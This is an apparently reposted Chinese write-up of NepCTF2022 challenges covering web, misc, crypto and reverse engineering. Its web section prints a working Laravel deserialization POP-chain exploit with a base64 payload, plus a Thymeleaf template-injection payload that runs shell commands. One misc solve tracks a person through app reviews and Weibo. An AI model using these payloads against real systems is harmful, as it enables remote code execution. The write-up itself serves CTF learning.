[CTF]-NepCTF2022
生活随笔
收集整理的這篇文章主要介紹了
[CTF]-NepCTF2022
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[CTF]-NepCTF2022
- web
- Just Kidding
- Challenger
- Misc
- 簽到
- 花花畫畫畫花花
- 餡餅?陷阱!
- 9點直播
- 少見的base
- 原來你也玩智能家居
- DoubleHappiness
- Crypto
- sinin
- 中學數學
- Re
- 簽到
web
Just Kidding
掃目錄有 www.zip
下載得到源碼 代碼審計
//App\Http\Controllers\HelloController.phpclass HelloController extends Controller {public function hello(\Illuminate\Http\Request $request){$h3 = base64_decode($request->input("h3"));unserialize($h3);return "Welcome Nepctf! GL&HF";}}發現這個 php 文件中有一個反序列化的函數,存在反序列化漏洞
查找 __destruct() 方法
跟進 src/Illuminate/Broadcasting/PendingBroadcast.php 中的 __destruct 方法, 可以看到這里的 $this->events 和 $this->event 均為可控的, 尋找可用的 dispatch 方法
這里跟進 src/Illuminate/Bus/Dispatcher.php 中的 dispatch 方法, 這里的 $command 和 $this->queueResolver 均是可控的.
跟進 dispatchToQueue 方法, $command 和 $this->queueResolver 均是可控的,
不難看出可以利用該方法中的 call_user_func 方法來進行命令執行的利用.
現在需要解決的就是命令執行的語句, 注意到上圖中的代碼 $connection = $command->connection ?? null;
這里可以通過 src/Illuminate/Broadcasting/BroadcastEvent.php 中的類中變量來控制 $connection
從而達到命令執行的目的.
//exp: <?php namespace Illuminate\Contracts\Queue{interface ShouldQueue {} } namespace Illuminate\Bus{class Dispatcher{protected $container;protected $pipeline;protected $pipes = [];protected $handlers = [];protected $queueResolver;function __construct(){$this->queueResolver = "system";}} } namespace Illuminate\Broadcasting{use Illuminate\Contracts\Queue\ShouldQueue;class BroadcastEvent implements ShouldQueue {function __construct() {}}class PendingBroadcast{protected $events;protected $event;function __construct() {$this->event = new BroadcastEvent();$this->event->connection = "cat /flag";$this->events = new \Illuminate\Bus\Dispatcher();}} } namespace {$pop = new \Illuminate\Broadcasting\PendingBroadcast();echo base64_encode(serialize($pop)); }payload
/hello?h3=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319Challenger
代碼審計
//關鍵代碼@GetMapping({"/eval"}) public String path(@RequestParam String lang) {return "user/" + lang + "/welcome"; }利用 Thymeleaf 模板注入
訪問 /eval 目錄
需要 lang 參數
然后找到 payload
?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.xMisc
簽到
套娃 230 多層
┌──(root?kali)-[/home/muz1/桌面] └─# binwalk xxx.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 33877 0x8455 Zip archive data, at least v1.0 to extract, compressed size: 77532, uncompressed size: 77532, name: 232.zip 111452 0x1B35C End of Zip archive, footer length: 22 111709 0x1B45D End of Zip archive, footer length: 22 ┌──(root?kali)-[/home/muz1/桌面] └─# foremost xxx.jpg Processing: xxx.jpg |foundat=232.zipUT foundat=繼續解壓呀 UT *|偽加密 , 改字段值
解壓出一個流量包
然后用 tshark 提取
tshark.exe -r .\keyboard.pcap -T fields -e usb.capdata > usbdata.txt 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 0200000000000000 02002f0000000000 0200000000000000 0000000000000000 00001a0000000000 00001a0800000000 0000080000000000 0000000000000000 00000f0000000000 0000000000000000 0000060000000000 0000000000000000 0000120000000000 0000121000000000 0000100000000000 0000000000000000 0000080000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000170000000000 0000120000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 00001f0000000000 0000000000000000 0000110000000000 0000000000000000 0000070000000000 0000000000000000 0200000000000000 0200300000000000 0200000000000000 0000000000000000 0000280000000000 0000000000000000轉一下格式
f = open('data.txt', 'r', encoding='utf-16') fi = open('out.txt', 'w', encoding='utf-16') while 1:a = f.readline().strip()if a:if len(a) == 16: # 鼠標流量的話 len 改為 8out = ''for i in range(0, len(a), 2):if i + 2 != len(a):out += a[i] + a[i + 1] + ":"else:out += a[i] + a[i + 1]fi.write(out)fi.write('\n')else:breakfi.close()然后提取關鍵信息
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e","09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j","0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o","13":"p", "14":"q", "15":"r", "16":"s", "17":"t","18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y","1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4","22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E","09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J","0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O","13":"P", "14":"Q", "15":"R", "16":"S", "17":"T","18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y","1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$","22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} output = [] keys = open('out.txt','r',encoding='utf-16') for line in keys:try:if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":continueif line[6:8] in normalKeys.keys():output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']else:output += ['[unknown]']except:pass keys.close() flag=0 print("".join(output)) for i in range(len(output)):try:a=output.index('<DEL>')del output[a]del output[a-1]except:pass for i in range(len(output)):try:if output[i]=="<CAP>":flag+=1output.pop(i)if flag==2:flag=0if flag!=0:output[i]=output[i].upper()except:pass print ('output :' + "".join(output)) output :nepctf{welcometonepctf2nd}<RET>nepctf{welcome_to_nepctf_2nd}花花畫畫畫花花
osu 文件推測為音游 osu
安裝后將該文件夾放入到歌曲目錄即可進行挑戰或編輯
NepCTF{MASTER_OF_壞女人!}餡餅?陷阱!
瓊 -> 海南
谷歌地圖 定位海南
搜索如家酒店
中國光大銀行NepCTF{www.cebbank.com}9點直播
直播間福利
少見的base
010查看 沒東西
binwalk沒東西
┌──(root?kali)-[~/桌面] └─# binwalk bbbbase.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01嘗試到了 Jphswin
選擇文件 --> seek --> 無密碼 --> 保存文件
010打開 --> 解碼
flag{Real_qiandao~}原來你也玩智能家居
admin / admin 登錄
首頁看見切換按鈕
這里就可以利用MQTT的通配符特性來捕獲cmnd下所有的數據,即cmnd/#
點擊切換按鈕
DoubleHappiness
用 Honeyview 打開
點擊GPS
查找附近的門店
找到附近的瑞星咖啡店為瑞幸咖啡(蓮花商務中心店)
上美團外賣APP上找到這家店鋪,查看評論區中日期為7月13日的評論
微博搜索 Tr0jAn-
果然沒錯,就是這小子。可以看到最新的一條微博發了一張寶石山俯瞰西湖夜景圖,在圖片右下角水印處有馬賽克,隱隱約約可以看出有NepCTF字樣。
可以把這個馬賽克先摳出來
再使用unRedacter工具來破解,需要注意的是,摳出來的馬賽克要調整一下比例(304x40),還要在字典里添加大寫英文字母、數字以及下劃線
NepCTF{ti_0d_nAj0r}Crypto
sinin
yafu分解 N
P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891得到 p 和 q, 然后和 c_mod_q c_mod_p 一起運算得到c
# 求兩個數的最大公約數gcd函數 def gcd(a, b):if b == 0:return aelse:return gcd(b, a % b)# 判斷一個列表任意兩個數是否兩兩互質def compare(list):for i in range(0, len(list)):flag = 1for j in range(i + 1, len(list)):if gcd(list[i], list[j]) != 1:print('不能直接使用中國剩余定理!')exit()# 如果滿足條件,就會繼續執行,否則退出程序# 求出輸入的m1,m2,..,mk 的乘積m def product_m(list):m = 1for i in list:m *= ireturn m# 求M1,M2,..,MK 的值 Mj = m / mj 并返回一個名為shang的列表 def get_divsion(list, m):div = []for i in list:div.append(m // i)return divdef get_inverse(a, m): # 求一個數a 的逆 再模m 的值 這個函數返回的是一個值不是列表if gcd(a, m) != 1:return Noneu1, u2, u3 = 1, 0, av1, v2, v3 = 0, 1, mwhile v3 != 0:q = u3 // v3v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3return u1 % m# 求Xj 算法為:Xj = (M * M_INVERSE * a) % mj def get_x(M: int, M_inverse: int, a: int, m: int):product_x = (M * M_inverse * a) % mreturn product_x# 算出最終答案X = X1+X2+...Xk def get_solution(list_m, list_a):# compare(list_m)m = product_m(list_m)list_M = get_divsion(list_m, m)list_M_inverse = []list_X = []total = 0for i in range(0, len(list_M)):list_M_inverse.append(get_inverse(list_M[i], list_m[i]))for i in range(len(list_M)):list_X.append(get_x(list_M[i], list_M_inverse[i], list_a[i], m))for x in list_X:total += xreturn total % m # 測試數據 list_m = [141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901,141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891] list_a = [32087476819370469840242617415402189007173583393431940289526096277088796498999849060235750455260897143027010566292541554247738211165214410052782944239055659645055068913404216441100218886028415095562520911677409842046139862877354601487378542714918065194110094824176055917454013488494374453496445104680546085816,59525076096565721328350936302014853798695106815890830036017737946936659488345231377005951566231961079087016626410792549096788255680730275579842963019533111895111371299157077454009624496993522735647049730706272867590368692485377454608513865895352910757518148630781337674813729235453169946609851250274688614922] print(get_solution(list_m, list_a))# 調用get_solution()函數即可使用中國剩余定理 # get_solution()函數要傳入得是兩個列表list_a,list_m # 讀取與輸入list_a,list_m;并將其變為整型的數據在帶入之后得到c , 然后繼續代碼
from Crypto.Util.number import long_to_bytes def fast_power(base, power, MOD):result = 1while power > 0:# If power is oddif power % 2 == 1:result = (result * base) % MOD# Divide the power by 2power = power // 2# Multiply base to itselfbase = (base * base) % MODreturn result def gcd(a, b):while a != 0:a, b = b % a, areturn b # calc : b^(-1) mod m def findModeInverse(b, m, show=True):if gcd(m, b) != 1:return NoneA1, A2, A3 = 1, 0, mB1, B2, B3 = 0, 1, bif show:print('-' * 54)print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("Q", "A1", "A2", "A3", "B1", "B2", "B3"))print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("-", A1, A2, A3, B1, B2, B3))while True:Q = A3 // B3B1, B2, B3, A1, A2, A3 = (A1 - Q * B1), (A2 - Q * B2), (A3 - Q * B3), B1, B2, B3if show:print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format(Q, A1, A2, A3, B1, B2, B3))if B3 == 0:return Noneelif B3 == 1:breakif show:print("-" * 54)return B2 % m p = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 q = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891 d = 1252990107815050396131095071106875863839625463162341861437776714252424196867083751438050781152678454544290561348477588314424473974689219719915628330383292496262245806653795391680166551537602119522395725446199697857165189662727850129646294082998077471030893379415607095699225984851603694723276083262879311002929800558428024700747018831268269585502183294987547669372754175415834581968714034535861714455512875208618004858007748676310828573704007774858023825900743373244384093983022857223181677619286464710238287796148593564498619278346936626883260434122906742989245858429095035901635408963549294384055658232382801968473 c = 11585753035364453623378164545833713948934121662572481093551492504984285077422719062455876099192809170965528989978916297975142142402092047776685650391890015591851053625214326683661927557815767412532952834312578481775648269348260126890551800182341487341482624921905494384205411870866282984671167687789838745481283560185866063970417999748309023918055613674098243729965218609202078551918246640314724590879724609275497227193516782920583249761139685192331805838597293957173545581106446048233248746840771791319643962479707861560044363232580020690857525268858245122996322707454824806268698526881569554077998480289824923073346 dp = d % (p-1) dq = d % (q-1) Cp = c % p Cq = c % q a = findModeInverse(q, p, False) # q對p的逆元 : 114 Mp = fast_power(Cp, dp, p) # 102 Mq = fast_power(Cq, dq, q) # 120 b = (a * ((Mp - Mq) % p)) % p c = Mq + b*q print("CRT的解密結果:", c) print(long_to_bytes(c)) NepCTF{ju5t_d0_f4ct_4nd_crt_th3n_d3crypt}中學數學
from gmpy2 import * # from Crypto.Util.number import * from Crypto import * from secret import *p = getPrime(1024) q = next_prime(p + (p >> 500)) e = 0x10001 n = p * q c = pow(bytes_to_long(flag), e, n) print("n=", n) print("c=", c)''' n= 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507c= 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186 '''根據代碼知道 p 和 q 很接近,但是用了腳本之后并不出
還有費馬定理的 p 和 q 很接近
找個費馬定理的腳本
Re
簽到
ida 打開修復報錯(改cfg文件 和 將圖形化設置修改一下)
左下角就是 flag
總結
以上是生活随笔為你收集整理的[CTF]-NepCTF2022的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python实现视频流媒体传输
- 下一篇: t6服务器验证密码失败,用友T6软件T6